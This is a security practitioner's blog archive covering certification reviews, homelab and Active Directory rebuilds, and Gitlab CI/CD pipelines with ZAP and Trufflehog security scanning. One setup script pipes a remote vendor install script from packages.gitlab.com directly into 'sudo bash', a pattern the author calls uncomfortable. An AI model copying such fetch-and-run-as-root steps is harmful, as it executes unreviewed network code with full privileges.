OSCP is entry-level stuff when you look at it from a technical perspective. All the exploits and vulns we need to work with during the exam are relatively clear-cut and you don't have to do any development yourself. 

What makes OSCP a heavy-hitter is the non-technical aspects: you are under incredible pressure (X boxes in Y hours, plus a full report), you are given a black-box environment with targets that could be (almost) anything. OSCP is about research skills, about time management, about perseverance.

If you do the PWK class work before the exam, you are almost fully prepped for the technical aspects (vuln types, exploiting vulns, etc). Doing a large part of the PWK labs will prepare you for the research part of the exam. Which leaves time management and perseverance, which are personal skills that you need to bring yourself. 

If you were to ask me for a better place to start, I'd look at eJPT first. 

Get your feet wet with the basics and something that's also recognized as a solid first start. 

I personally think OSCP isn't a good first cert because, if you're still getting to know your way around the tech basics, then you won't have enough time to learn-on-the-job during the exam. 

If you have a good background on Linux/Unix and Windows, knowing how their services can be abused and how privesc can be done, and you've actually done it a few times, then you're on the way. Ditto for vulns and exploits in webapps or other network services: if you understand them and can apply them, then at least you have the basics out of the way.

With the OSCP exam, there's no telling what you're getting! It could be relatively new software on a new OS, or it could be an antique application in a weird old language. 

If you know the basics of vulns and exploits, then you at least know what you're looking for. You will only have to learn the actual target on-the-fly.


kilala.nl tags: ,

View or add comments (curr. 0)

Dick would have enjoyed this: new addition to the lab

2021-07-29 14:45:00

A stack of servers and a phone

Last week was awesome! It was the last Friday before summer break, so I decided to move the class on Vagrant and Docker forward. This would give my Linux+ students a few cool things to play with during their holiday!

Next to that very fun day, one of my colleagues at ITVitae also gifted me a piece of old gear: a lovely, 2009 Apple XServe 3.1. Dick would've loved that, what with us both being Apple-geeks.

The drives were wiped, so I've found a way to image the MacOS 10.11 installer onto one of them. Aside from that: it has dual Xeons like my R410 and R710, 3x2TB of disks (one of which will move to the R710 for my lab) and 24GB of RAM.

This baby might be noisy and a bit underpowered, but it'll make a great Docker-host to complete my lab. Awww yeah!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Not renewing my CEH

2021-06-23 15:27:00

Over the past decade or two, I've put in a lot of study-time to garner certificates for continued professionalization. Some of'm I'm really proud of, some were fun or cool, some were frustrating and some were just "meh".

EC Council's CEH (Certified Ethical Hacker) is one of those "meh" certificates, where my biggest motivation for continued renewal was the dreaded HR-checklist. EC Council have a great marketing department, that's ensured that "CEH" is on many corporate security job requirements.

That's the only reason why I kept paying my annual dues. Never because I'm proud of it, or because I feel it adds to my profession, always for the market value. 

Not any more. 

Between recent social media muck-ups, between debatable practices and mediocre professional value, I've decided to stop sending my money to ECC. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Failure is a great teacher

2021-06-20 21:19:00

A few weeks ago I noticed that my Win2012 trial licenses are no longer tennable: a big change to my homelab is needed! Since then I've worked dilligently on a few projects, all happening in parallel.

That's a lot of stuff going on!

As the title of this post says: failure is a great teacher and boy did I have a lot of failures! 😂

For now there's too much to sum up in great detail, so I'll get back to the deets later. For now, some stuff I ran into:

After a weekend with lots of hard work, my AD domain is stable and usable again. All GPOs work again, the syncing between DCs works, the DFSR for SYSVOL works again. And the migration of the issuing CA to 2019 has also completed, with hosts being able to auto-enroll and validate certs again. 

There's so much more to do though! Thank ${Deity} for my Jira boards!


kilala.nl tags: , , ,

View or add comments (curr. 0)

CompTIA Pentest+: objectives comparison between PT0-001 and PT0-002

2021-06-01 19:08:00

It's a bit late, but people studying for the Pentest+ PT0-002 beta exam can probably use a list of all the differences between versions 001 and 002 of the objectives. I reckon the list could also be useful for students who want to give it a shot in October / November, because very few study materials will be available. 

I've done a quick cross-reference of the objectives documents (also linked below), to make an Excel / CSV with the differences between the objectives. Careful, they're probably not 100% on the money.

CompTIA trainers get a licensed document that does a better job at explaining the differences, but we can hardly share that, right? My comparison document was made the hard way, literally cross-matching both objective documents. Hence why I may have made a few mistakes.

The official objective documents:

And here's CompTIA's official blog about the two exam versions.


kilala.nl tags: ,

View or add comments (curr. 0)

Dynamic DNS and a discovery about Unifi equipment

2021-05-29 21:07:00

It's odd that I've never had much of a use for dynamic DNS solutions, but now that I'm testing VPN to my homelab I've also taken a look at AFraid's FreeDNS

So far I'm enjoying the late 90s, early 2000s look-and-feel of their management interface. It's endearing!


kilala.nl tags: ,

View or add comments (curr. 0)

Homelab rebuild needed

2021-05-29 20:39:00

Well darn. The "slmgr -rearm" trick will no longer work, after renewing the trial licenses on my WinSrv 2012 boxen a few times. This means I'll have to rebuild my Active Directory and Certificate Services infrastructure on short notice. Better yet, it's time to do something with my/our partnership contract with Microsoft, to get official licenses for Win2016. 

Oddly, Nicola's instructions on making the iDRAC6 remote console work on MacOS now fail for me. The connection that worked a month ago now reliably fails as "Connection failed". 

Luckily, Github user DomiStyle is awesome! They've prepared a Docker container that runs the iDRAC connection software and makes two local ports available: 5900 for VNC and 5800 for the web interface. It's excellent!


kilala.nl tags: , ,

View or add comments (curr. 0)

Know your limitations, even if it's "too late"

2021-05-27 10:55:00

I don't know if my old classmate René is still reading along. If he is, he'll nod approvingly and think to himself: "told you so". :)

I feel very heavy-hearted, because I feel that I’m letting a few awesome people (Stephen, Thomasina, Rick B. at CompTIA) down. 

I'm backing down from teaching the Pentest+ TTT. It seems that I’ve been harboring a lot of stress, piling on way too much for myself, without really noticing it. To make sure that I can still pay full attention to my family, my primary customer, my students at IT Vitae and my own studies, I have to drop this responsibility.

I was very much looking forward to helping CompTIA with Pentest+, but right now it would not be a smart thing to continue with.


kilala.nl tags: , ,

View or add comments (curr. 0)

DevChamps "Extreme Automation" training

2021-05-17 06:56:00

After completing PDSO's CDP (Certified DevSecOps Professional) two months ago, I was left wanting more. More CI/CD, more pipelines, more automation. That's when, via-via, I met Andrey Adamovich via LinkedIn. Andrey works with a collective of DevOps trainers, to teach his XA: Extreme Automation training.

To sum it up: I was looking for a little extra fun, to expand upon what I'd learned in the past two years and the price was right at €700 for a three-day training with all the labs neatly arranged for students. 

To summarize my impressions:

Would I recommend Andreys class? Yes, especially to folks in my shoes (security engineer) who need a quick introduction to modern-day IT infrastructure.

As to what I've learned during class? Well, Ansible and Docker weren't new to me, but that's perfectly okay. Terraform was very nice to get to know better, while Packer and Kubernetes were eye-opening. 

My biggest take-away is that I'm behind the times on modern-day infrastructure. This class has helped me recognize some of my bigger knowledge-gaps, which means I can now address them. 

My first order of business in my homelab should be to attempt a complete rebuild, using Packer to create golden images and using Terraform to drive VMWare ESXi, instead of using Vagrant. From there on out, I should try to use my Gitlab instance together with K8s and Docker to run many of my services. Luckily I have two Dell servers for my lab, so I can repurpose an old laptop as Terraform+Packer box while using the smaller Dell to first test-run my configs. 

The sad part is, as Andrey mentioned halfway through day 3: he expects that within a few years many apps and services will move to a server-less model, like Lambda or Azure Functions. That means that >60% of what we learned in XA will become much less useful. 


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA closed beta for CASP+ CAS-004

2021-05-13 10:33:00

CompTIA often have beta releases for new versions of their exams. You'll notice my blog has articles dating back a few years, where I keep doing these beta tests, "for fun and profit". Most betas are open to all takers, but the CASP+ (advanced security practitioner) is "closed". With thanks to some very nice people at CompTIA I managed to get accepted into the closed beta. 

Took the test this morning, at home via the OnVue testing solution. As before my experiences with OnVue were decent. 

However! In a not-so-fun move, PearsonVue decided to do a big and unannounced IAM change! Anyone who's testing via PearsonVue for CompTIA, whom also has tested for other companies (such as Microsoft) has now been forced to take a new username. They literally changed everybody's login names, without warning them up front. And no, you also don't get an email. Now they have a warning on their login page, but last night I got a big fright because there was zero information!

Here's a few things I took away from the CAS-004 beta.

The exam gave me three hours time and took me between a bit less than two hours to power through without going back to any questions. There were plenty "bad" questions in there (see above) and a few where I honestly would not know the answer. Since this is a beta I decided to pludge it without studying any of the books or materials.


kilala.nl tags: ,

View or add comments (curr. 0)

Exciting times ahead! Working with CompTIA

2021-05-02 09:12:00

pentest book

Wow, it looks like this is really happening! Amazing! :D

I was recently contacted by Stephen, from CompTIA's CIN. They wondered whether I'd be interested in teaching the TTT (train the trainer) for PT0-002 Pentest+ in October. 

It's daunting! It's exciting! It's gonna be a lot of fun! :)


kilala.nl tags: ,

View or add comments (curr. 0)

A short review of CompTIA Security+

2021-04-30 09:41:00

Earlier this year I completed CIN's TTT (train-the-trainer) for Security+, CompTIA's entry-evel InfoSec certification. I hope to teach the subject matter at ITVitae or elsewhere in the near future, so I'd better prepare myself on the exam objectives. 

Overall I'm pleased with the body of knowledge covered by Security+; there's a reason why I frequently recommend the learning path to colleagues starting out in IT security. The BoK covers security fundamentals which I feel should be understood by anyone in IT: developer, engineer, risk management, I don't care. Everybody in IT should know this stuff. :)

Paul Jerimy's excellent security certification roadmap places Sec+ at the foundational level. There's no shortness of comparisons between Security+, SSCP, CISSP, GSEC, CEH and others on the Internet, for example this one. Most of us agree: Sec+ is foundational knowledge for those starting in IT. 

I sat the exam this morning, version 601, and I passed. Would've been worrisome if I hadn't! ;) 

I'm pretty happy with the exam's contents: there's a decent spread of topics covered and only two out of my 82 questions were worded sub-optimally. The PBQs actually were pretty good!


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA PT1-002 Pentest+ beta

2021-04-23 09:45:00

A little under three years have passed since I last took the CompTIA Pentest+ exam. Like last time, I took the beta-version of the exam. Just like last time, I decided to go into the exam completely blank, only taking a glance at the official objectives beforehand.

The OnVue at-home testing experience offered by PearsonVue, like always, was decent. The tooling works well enough, the proctor was communicative, waiting times weren't too bad. The software feels kind of intrusive, as to what it wants to do on your laptop, but at least it didn't want me to install anything, nor does it require admin-level rights. 

As to the exam itself, my experiences mirror what I felt back in 2018: 

I feel that the PT1-002 exam needs some polishing and a few corrections, but overall the level of difficulty and the type of questions asked do in fact do a fairly good job at testing someone with 2-3 years of pentesting experience.

I'm curious whether I've passed! As was said: I went in without preparation and there's definitely a number of objective areas where I don't have experience. 

EDIT:

A forum acquaintance reminded me of the following:

"You see a preponderance of exam items referring the same concept because the vendor is attempting to determine which of those (experimental) items to include in the (production) exam item pool. ... When taking a beta exam, you are helping to create the exam item pool for the initial public release of the exam, not taking the initial public release of the exam itself."


kilala.nl tags: , ,

View or add comments (curr. 1)

One of my mottos in life

2021-04-06 13:21:00

Hanekawa from Bakemonogatari

2009 is a long time ago, but I recall very much enjoying "Bakemonogatari" (explained here) back then. 

One of the lines from that show that's always stuck with me is something Hanekawa says multiple times. It's kind of become my tagline in life and work.

It matches my Jill-of-all-trades, T-shaped engineering approach. ( ^_^)

"I don't know everything, I just happen to know this."


kilala.nl tags: , ,

View or add comments (curr. 0)

Finished a lot of hard work: the CDP exam, Certified DevSecOps Professional

2021-03-04 10:10:00

I know, I know: the past weeks it's been nothing but Gitlab over here :D That's going to quiet down now. How did all of that get started though?

Back in January, I posted the following question on the BHIS Discord:

"When it comes to CICD, microservices and the whole modern API reality I'm quite out of my depth. I never was a developer, can't code my way out of a wet paper bag; was always on the sysadmin and secops side. 

Are you guys aware of any trainings or bootcamps that are squarely aimed at grabbing my demography (sysadmin, secops) by the scruff of their neck and dumping them through the whole process of building a sample API, automated building and testing and then ramming it onto something like Azure of CloudFoundry? 

I've been on the sidelines of plenty CICD, helping DevOps teams with their Linux and security troubles... but now I really need to know what they do all day.

Anything commercial, that lasts multiple days and is from a reputable vendor would be absolutely great. I don't care too much about which solutions are used in said training. Key words may include: Spring.boot, Maven, Git, Azure DevOps, Github Actions, Fortify. Just an all-in-one "journey" would be lovely."

I asked around with friends and colleagues. Most folks weren't aware of any such trainings, though one pointed me at Kode Kloud, another suggested Dev Champs and two of them suggested Practical DevSecOps.

PDSO's CDP course, Certified DevSecOps Professional, listed selling points that matched what I wanted:

Having now completed the whole course and having passed the exam, here's my impressions about PDSO's CDP course:

My overall verdict, was the CDP course worth it? Yes, it was. I learned a lot, I got to mess around with a lot of cool tools and the exam was challenging.

One tip that I'd give students is to also run a CI/CD environment of their own, with more projects than the one or two in the labs. I have gained so much extra knowledge from running Gitlab in my homelab, with 6-7 vulnerable apps! It's been awesome and educational. 

A few of my fellow students asked for pointers on the exam. I wouldn't want to give anything away that's covered by the NDAs, but I can tell you this much:

Basically, be ready to do high-paced learning and studying on-the-fly. In that regards, this exam isn't too different from the OSCP pen-testing exam: the concepts are the same, but you will need to do research on the job :)

Most importantly:

  1. As John Strand always says: "Document as you go!" Take notes all the way through your work, don't put that off until the end.
  2. Clone your exam repository to your local computer and pull updates regularly! I lost 11 hours of work on my exam, because my Gitlab got reprovisioned.

kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps CDP exam: heart attack moment

2021-02-28 20:44:00

An erase git repository

Let me tell you! When you're 11.5 hours into a 12 hour exam, this is NOT a screen you want to see on your main Gitlab that holds all your exam code. ( O_o)

Thank ${Deity} I cloned it all to my local system.

To clarify that a little bit: the CDP exam I took today is a practical exam where you spend twelve hours hacking, testing and building code that manages an application infrastructure. The whole exam, like the labs during class, are "in the cloud" run by Practical DevSecOps

Around 1700, while trying to deploy a Docker container or two, my Gitlab runner became unresponsive and my Docker daemon died. Then the app webserver died. And then other students started piping up in chat that their labs were stuck.

Finally, around 1730 my Gitlab server (which holds all my exam code) was reprovisioned. That is: erased, rebuilt, re-installed. My work for the past eleven hours was gone. 

So as I said: thank ${Deity} I had cloned my git repositores to my local machine. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Quick notes: script to setup Gitlab runners and run as Ansible

2021-02-26 10:55:00

Just some quick notes I've been making on how to quickly get gitlab-runner up on a Linux box. I still feel very yucky about curl-in a file into sudo bash, so I'll probs grab the file locally instead and make sure it doesn't do anything nasty.

The following example was used on my Ansible host, to install gitlab-runner and to have it run as the local "ansible" user account instead of root. It registers and starts two runners.

curl -L "https://packages.gitlab.com/install/repositories/runner/gitlab-runner/script.rpm.sh" | sudo bash
 
export GITLAB_RUNNER_DISABLE_SKEL=true; sudo -E yum install -y gitlab-runner
 
sudo gitlab-runner uninstall
 
sudo mkdir /etc/systemd/system/gitlab-runner.service.d/
cat > /tmp/exec_start.conf << EOF
 
[Service]
ExecStart=
ExecStart=/usr/bin/gitlab-runner "run" "--working-directory" "/home/ansible/gitlab" "--config" "/etc/gitlab-runner/config.toml" "--service" "gitlab-runner" "--user" "ansible"
EOF
 
sudo mv /tmp/exec_start.conf /etc/systemd/system/gitlab-runner.service.d/exec_start.conf
 
sudo systemctl daemon-reload
sudo systemctl enable gitlab-runner
sudo systemctl start gitlab-runner
 
sudo cp /tmp/broehaha-cachain.pem /etc/gitlab-runner/cachain.pem
 
read -p "gitlab reg token: " GITLAB_TOKEN
 
sudo gitlab-runner register --non-interactive
--tls-ca-file=/etc/gitlab-runner/cachain.pem
--tag-list ansible
--name ansible.corp.broehaha.nl
--registration-token ${GITLAB_TOKEN}
--url https://gitlab.corp.broehaha.nl
--executor shell
--locked=false
 
sudo gitlab-runner register --non-interactive
--tls-ca-file=/etc/gitlab-runner/cachain.pem
--tag-list ansible
--name ansible.corp.broehaha.nl
--registration-token ${GITLAB_TOKEN}
--url https://gitlab.corp.broehaha.nl
--executor shell
--locked=false

kilala.nl tags: , ,

View or add comments (curr. 0)

Over-doing it? Maybe... Almost time to chill a bit.

2021-02-20 17:13:00

Heh, it's a bit ironic, no? Six weeks ago I wondered whether I was over-doing it, with work and my studies. I'd just finished a few course and two exams and was about to start with a new client. 

Not two weeks later I've taken another two classes and I'm about to take another exam. A twelve hour, practical exam followed by documentation and reporting. 

I've promised myself that, once I'm done with the exam, I'll spend a few weeks on nothing but gaming! Genshin Impact here I come! :)

EDIT:

Ah. I just realized: I start teaching class again in 6-8 weeks. That'll require prep-time too :D


kilala.nl tags: , ,

View or add comments (curr. 0)

Security testing OWASP Juice Shop in Gitlab CI/CD

2021-02-20 16:10:00

Gitlab pipeline

After finishing the awesome BHIS "Modern Webapp Pen-testing" class (January), I immediately rolled into the "Certified DevSecOps Professional" course. I am lacking in experience with CI/CD, while having to support DevOps engineers every day.

The CDP labs by Practical SecDevOps are okay, but only testing Django.NV got stale.

What better way to learn about SAST, DAST, SCA and more than by running our beloved Juice Shop webapp through my own CI/CD pipeline?! :D 

Not only does this give me a private Juice Shop in a safe environment (my homelab), but it got me more familiar with Gitlab and all the things that come with DevSecOps / SecDevOps / Security in DevOps / however you wanna call it. 

The image above shows the Juice Shop project in my Gitlab, with its security testing and deployment stages. The last "Compliance" stage (with Inspec) didn't fit into the pic.

Running the pipeline builds a Docker image for Juice Shop, runs SAST, SCA, secret scanning and linters, then runs the Docker image on my testbox and runs Nikto, ZAP and SSLyze against it as DAST. All very much default/basic, but it's a start!


kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps and their CDP training

2021-02-19 07:42:00

I've been mentioning Gitlab for a while now and you might wonder why the sudden change. :D I'm working my way through the CDP training from Practical DevSecOps.

I needed a crash course that took me through a practical example of CI/CD pipelines, from A to Z, in a hurry. I'm in security and I need to advise DevOps engineers who work on those pipelines every day. I found it harder and harder to relate to them without having gone through their journey myself. Intellectually I understood most of the concepts, but everything stayed very vauge without me actually doing it hands-on.

So far the course is a resounding "okay". It's not wonderful, it's not bad, it's just that: pretty good. The slide decks are decent, the trainer narrating the videos has a nice voice, but the narration is quite literally reading from the text book. Some of the text on slides and in the labs was lifted directly from third party sources such as projects' Github pages or from articles like Annie Hedgpeth's series on running Inspec

They have a huge amount of online labs, which is good, even if they get repetitive. So what I've done is setup Gitlab in my homelab as well, and apply all the things the course teaches me to multiple intentionally-vulnerable web apps.

So I've got Git repos for Juice Shop (Node.JS and Angular), django.nv (Python and JS), Webgoat (Java), GoVWA (Go) and others, which I'm treating like they were projects for my simulated company. Each of these gets its own CI/CD pipeline to run code quality checks, SAST, DAST and automated build + deploy through Docker.

It's been one heck of a learning experience and I'm looking forward to the closing exam, which is another 24h practical exam. I love those!


kilala.nl tags: , ,

View or add comments (curr. 0)

Gitlab runner "shell" executor cannot upload artifacts

2021-02-17 20:30:00

When using a "shell" executor with gitlab-runner you may run into the following errors, when trying to upload artifacts to Gitlab.

ERROR: Uploading artifacts as "archive" to coordinator... error error=couldn't execute POST against https://gitlab.corp.broehaha.nl/api/v4/jobs/847/artifacts?artifact_format=zip&artifact_type=archive: Post https://gitlab.corp.broehaha.nl/api/v4/jobs/847/artifacts?artifact_format=zip&artifact_type=archive: proxyconnect tcp: tls: first record does not look like a TLS handshake

The issue here is that your "gitlab-runner" user account has picked up a http proxy configuration that's not sitting well with it.

In my homelab, the proxy settings are configured for all users using Ansible, through "/etc/profile". For the "gitlab-runner" user that apparently may be problematic when trying to talk to the internal Gitlab server. Quick and dirty work-around: unset the proxy settings from your environment.

echo "unset http_proxy; unset https_proxy" >> ~/.bashrc
echo "unset http_proxy; unset https_proxy" >> ~/.profile

kilala.nl tags: , ,

View or add comments (curr. 0)

Challenges running "owasp/zap2docker-stable" without docker:dind

2021-02-17 19:35:00

As part of the CDP course we're running unattended ZAP scans as part of integration testing, using the "owasp/zap2docker-stable" Docker container. The course materials tell you to run the CI/CD task using "docker:dind", a Docker-in-Docker solution. For some reason my Docker boxen aren't a fan of that; I'll have to debug that later.

Trying to run the ZAP container with a simple "shell" executor through gitlab-runner led to some fun challenges though! The course material suggests the following Docker run command:

docker run --user $(id -u):$(id -g) -w /zap -v $(pwd):/zap/wrk:rw --rm owasp/zap2docker-stable zap-baseline.py -t https://target:port -J zap-output.json

To sum it up: start the ZAP container, run the ZAP baseline script using your current UID and GID, mount your local directory as /zap/wrk and then write the results as a JSON file onto the mounted local directory.

This approach fails in two ways if you're not doing the fastest, dirty approach: running as the "root" user account.

Either you use it with "--user $(id -u):$(id -g)" and then you get the error message "Failed to start ZAP :(". Or you run it without that setting, then ZAP runs but it cannot save the output file, with a "permission denied: /zap/wrk/zap-output.json" message.

The issue here is that container has a very limited setup of users (as it should) and your uid+gid are most likely not in there. Under normal conditions, the ZAP scripts inside the container run as "zap:1000:1000" but that user doesn't have write access to your user's directory on the Docker host.

So... If you're running the ZAP container directly on your host and not as DinD, then you'll need to setup a temporary directory and setup write access for either uid:1000 or gid:1000 to it. The latter feels "better" to me. Then we'll end up with this (assuming Gitlab):

zap-baseline:
    stage: integration
    dependencies: []
    allow_failure: true
    tags:
        - shell
    before_script:
        - docker pull owasp/zap2docker-stable
        - mkdir output; chgrp -f 1000 output; chmod 770 output; cd output
    script: 
        - docker run --rm -v $(pwd):/zap/wrk owasp/zap2docker-stable zap-baseline.py -t http://target:port -J zap-output.json
    artifacts:
        paths: [output/zap-output.json]
        when: always 

kilala.nl tags: , ,

View or add comments (curr. 0)

WTF Apple? QA oversight with Big Sur bricks your device

2021-02-13 21:31:00

Whelp that's just wonderful. 

A QA oversight in Apple's Big Sur updater may lead to your system getting stuck in an endless loop. Worse, if your disk is encrypted using File Vault, you're quite completely hosed. Excellent explanation over here by Mr Macintosh.

Yet again this is a reminder to Always Make Backups!!!

So what's this little mixup Apple made in their quality assurance? The Big Sur updater does not check that it has enough storage space available on your Mac to complete the OS installation. Depending on how much space you have it will either start but refuse to complete the install, or it will start and fail to complete the install. In the latter case, you're in trouble. 

With two of our Macbooks Air the install went fine, but Marli's MBA was the smaller 128GB SSD model. With 39GB free space things went tits-up. Thank ${Deity} that we hadn't enabled File Vault on this one. 

Now I can at least boot into recovery mode. Disk Utility refuses to properly image the internal storage to a USB drive, but at least dd still works. Man, this is not how I expected my Saturday evening to go. ( ; =_=)


kilala.nl tags: , ,

View or add comments (curr. 0)

Practical DevSecOps: CDP labs example pipeline

2021-02-07 22:08:00

A pipeline in Gitlab

I'll talk about it in more detail at a later point in time, but I'm about a week's worth into the Certified DevSecOps Professional training by Practical DevSecOps. So far my impressions are moderately positive, more about that later. 

In the labs we'll go through a whole bunch of exercises, applying a multitude of security tests to a Gitlab repository with a vulnerable application. Most of the labs involve nVisium's sample webapp django.nV.

Having reached the half-way point after that one week, I had not encountered two crucial parts of the DevOps / CICD pipeline which I'm not at all familiar with. We're applying all kinds of tests, but we never did the steps you'd expect before or after: creating the artifacts, deploying and running them. As I've said before, I'm #NotACoder.

Instead of focusing on one of the next chapters, today I spent all day improving my Gitlab and Docker install by applying all the required trusts and TLS certificates. This, in the end, enabled me to create, push, pull and run a Docker image with the django.nV web app. 

If anyone's interested: here's my Dockerfile and gitlab-ci.yml that I'd used in my homelab. You cannot just throw them into your own env, without at least changing username, passwords and URLs. You'll of course also need a Docker host with a gitlab-runner for deployment.

Note: The Docker deploy and execute steps show a bad practice, hard-coded credentials in a pipeline configuration. Ideally this challenge should be solved with variables or even better: integration with a vault like Azure Vault, PasswordState or CyberArk PasswordVault. For now, since this is my homelab, I'll leave them in there as a test for Trufflehog and the other scanners ;)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Integrating Gitlab into your lab with private PKI

2021-02-07 19:45:00

My homelab runs its own PKI and most servers and services are provided with correct and trusted certificates. It's a matter of discipline and of testing as close to production as possible. 

Getting Gitlab on board is a fairly okay process, but takes a bit to figure out. 

So my quick and dirty way of getting things set up:

  1. On ADCS generate a new, exportable key pair with the right settings. 
  2. Run this keypair through a locally created .inf request file with an extension for the subject alt. name (see example).
  3. Issue the requested cert and import it.
  4. Export the full keypair plus cert as a PKCS12 / .pfx file.
  5. Transfer the .pfx to the Gitlab server and store safely in "/etc/gitlab/ssl/". Set to ownership by root, and only readable by root. 
  6. Use "openssl" to extract the private key and certificate from the .pfx file. Then use it as well to decrypt the private key. 
  7. Replace the pre-existing gitlabhostname.crt and gitlabhostname.key files with the newly extracted files.

Now, you also want Gitlab and your runners to trust your internal PKI! So you will need to ask your PKI admin (myself in this case) for the CA certificate chain. You will also need the individual certificates for the root and intermediary PKI servers. 

  1. In your Gitlab host, copy the individual PKI certificates into "/etc/gitlab/trusted-certs". 
  2. On your Gitlab runner hosts, copy the CA chain into "/etc/gitlab-runner" and reconfigure "/etc/gitlab-runner/config.toml" so each runner has a line for "tls-ca-file". 
  3. If you haven't done so already, make sure the rest of your Linux host also trusts your PKI by importing the certs.
  4. According to the Docker manuals, Docker uses both its own config file and the Linux/Windows central trust store. So completing step #3 is good enough. But, Docker will only pick up new certs after you restart the engine!

Don't forget to restart Gitlab itself, the runners and Docker after making these config changes!

You can then perform the following tests, to make sure everything's up and running with the right certs.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Debugging: Trufflehog reports no secrets in Gitlab CICD

2021-02-06 21:59:00

Durning the CDP class, one of the tools that gets discussed is Trufflehog. TLDR: yet another secrets scanner, this one built in Python. 

I ran into an odd situation running Trufflehog on my internal Gitlab CICD pipelines: despite running it against the intentionally vulnerable project Django.nv, it would come back with exit code 0 and no output at all. 

Why is this odd? Because it would report a large list of findings:

But whenever I let Gitlab do it all automated, it would always come up blank. So strange! All the troubleshooting I did confirmed that it should have worked: the files were all there, the location was recognized as a Git repository, Trufflehog itself runs perfectly. But it just wouldn't go...

I still don't know why it's not working, but I did find a filthy workaround:

trufflehog:
  stage: build
  allow_failure: true
  image: python:latest
  before_script:
    - pip3 install trufflehog
- git branch trufflehog
  script:
    - trufflehog --branch trufflehog --json . | tee trufflehog-output.json
  artifacts:
    paths: [ "trufflehog-output.json" ]
    when: always

If I first make a new branch and then hard-force Trufflehog to look at that branch locally, it will work as expected. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Gitlab-runner not picking up jobs after reboot

2021-02-06 19:35:00

As part of my studying for the CDP course, I've expanded my homelab with a private instance of Gitlab. I've got to say: I like it! A lot. It's good software! 

To accomodate my builds I expanded the RAM on my Docker host VM and set up three "gitlab-runners" to pick up jobs from Gitlab CICD pipelines. Microsoft's documentation is outstanding: the runners were installed and configured within minutes.

The only thing I really disliked was their instructions to "wget https://some-url | bash -". That always feels so fscking scary. 

As part of my change management process the Docker host of course needed a reboot, to see if things some up correctly. They did and the "gitlab-runner" process was there as well. But it wasn't picking up any jobs! Only when I SSHd into the host and ran "sudo gitlab-runner run" would jobs start flowing. 

At first I thought I just didn't understand the concept of the runner process well enough. Maybe I hadn't set them up correctly? Then I decided to do the logical thing: check the logs. I've been teaching my students to do so, so why didn't I? :D

"sudo systemctl status gitlab-runner -l" showed me the following:

$ sudo systemctl status gitlab-runner -l
● gitlab-runner.service - GitLab Runner
   Loaded: loaded
   Active: active

...
Feb 06 19:24:37 gitlab-runner[20361]: WARNING: Checking for jobs... failed
runner=REDACTED status=couldn't execute POST against https://REDACTED/api/v4/jobs/request: 
Post https://REDACTED/api/v4/jobs/request: x509: certificate signed by unknown authority

The self-signed cert isn't too surprising, since I still have a backlog item to get that fixed. I wanted to first get the basics right before getting a proper cert from my PKI. But I thought I had dealt with that by registering the runner with a CA cert override. 

Checking "/etc/gitlab-runner/config.toml" showed me where I had gone wrong: the CA cert override path was relative, not exact.

[[runners]]
  name = "REDACTED"
  url = "https://REDACTED"
  token = "REDACTED"
  tls-ca-file = "./gitlab.pem"
  executor = "docker"

I had assumed that the cert would be picked up by the runner config and stored elsewhere, instead of being referenced from the file system. Wrong! I made sure to copy the self-signed cert to "/etc/gitlab-runner/gitlab.pem" after which I corrected the "config.toml" file to use the correct path. 

One quick restart of the runner service and now jobs are automatically picked up!


kilala.nl tags: , , ,

View or add comments (curr. 3)

Updating my pen-testing experience: "Modern Webapp Pen-testing" by BHIS and WWHF

2021-01-29 16:14:00

I've been dabbling in pen-testing for a few years now; it's never been my main gig and I wonder whether it'll ever be. For now it's a wonderful challenge which makes its way into my work assignments. 

Case in point: at my new customer I'll be performing pen-tests on contemporary applications and services. Java backends, Javascript frontends and lots of APIs! It's in that area that I feel I need additional development: I've learned and practiced with a lot of vulnerabilities and software stacks, but not these. 

Which is why I yet again turned to Black Hills InfoSec and WWHF, for another training! This time around, it's "Modern webapp pen-testing with B.B. King".

Where the "Applied Purple Teaming" class I recently took was okay, B.B.'s class was excellent! All the labs use OWASP's Juice Shop project, which combines NodeJS on the backend (with REST APIs!) with AngularJS on the frontend. Throw in MongoDB for some NoSQL and you've got a party going!

All in all, B.B.'s teaching style is great and his interactions with us students were pure gold. In general, the Discord chat was lively and had great contributions from people all over the world. I'd highly recommend this class! I'll defo learn more with Juice Shop and other vulnerable apps in the upcoming months. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching software vulnerabilities: OWASP SKF Labs

2021-01-28 15:42:00

At one of my previous clients, we taught developers and engineers about a number of common software vulnerabilities through an in-house course. The training makes use of labs provided by OWASP's SKF Labs project

The SKF Labs offer dozens of Dockerized mini-webapps, each of them purpose built to demo one type of vulnerability. They're the exact inverse of demo apps like Juice Shop or DVWA, which combine many different vulns into one webapp. 

The Dockerized apps make it easy to teach a small set of vulns to students: all they need is Docker and a way to pull in the public containers. 

After teaching with these labs, I also wanted to contribute! There were two specific vulnerability types that I wanted to include in our teaching:

Building the first of those apps was easy: just clone one of the existing Dockerized apps and adjust where needed.

The second one was an absolute blast to build, because it forced me to learn new things! I had to practice my Python, I got started with TCP/IP packet crafting in Scapy and I got to learn NetFilter plugins! I learned a lot from a similar project by Ludovic Barman

The TLS downgrade demo is something I'm pretty darn proud of! I learned how to build a Python script which performs a man-in-the-middle attack on TLS, through the abuse of NetFilter plugins and by tweaking TLS packets using Scapy! What a rush!


kilala.nl tags: ,

View or add comments (curr. 0)

"Applied Purple Teaming" training, by BHIS and Defensive Origins

2021-01-08 15:19:00

I fear that I may have been over-doing it a little bit the past few weeks. 

December 21st was my last day at my previous assignment, with my new assignment starting January 11th. The three weeks inbetween were spent on the holidays and on studying. I pushed through:

The latter two are both advertised as 16 hour trainings, but I've easily spent upwards of 20-25 hours on each to go through the labs and to research side quests. A few hours more on improvements to the labs for the latter, since I ran into many problems with their Terraforming scripts for Azure Cloud. Huzzah for cooperation through Github. 

While I found the APT class very educational, I can't shake the feeling that it could have been better. In some cases K&J skipped through a number of topics relatively quickly, as "these are basics, etc" and at some points there was rapid back-and-forth between slides. Granted, I did watch the VoD-recordings of their July session and I expect their more recent classes to have been more fluent. 

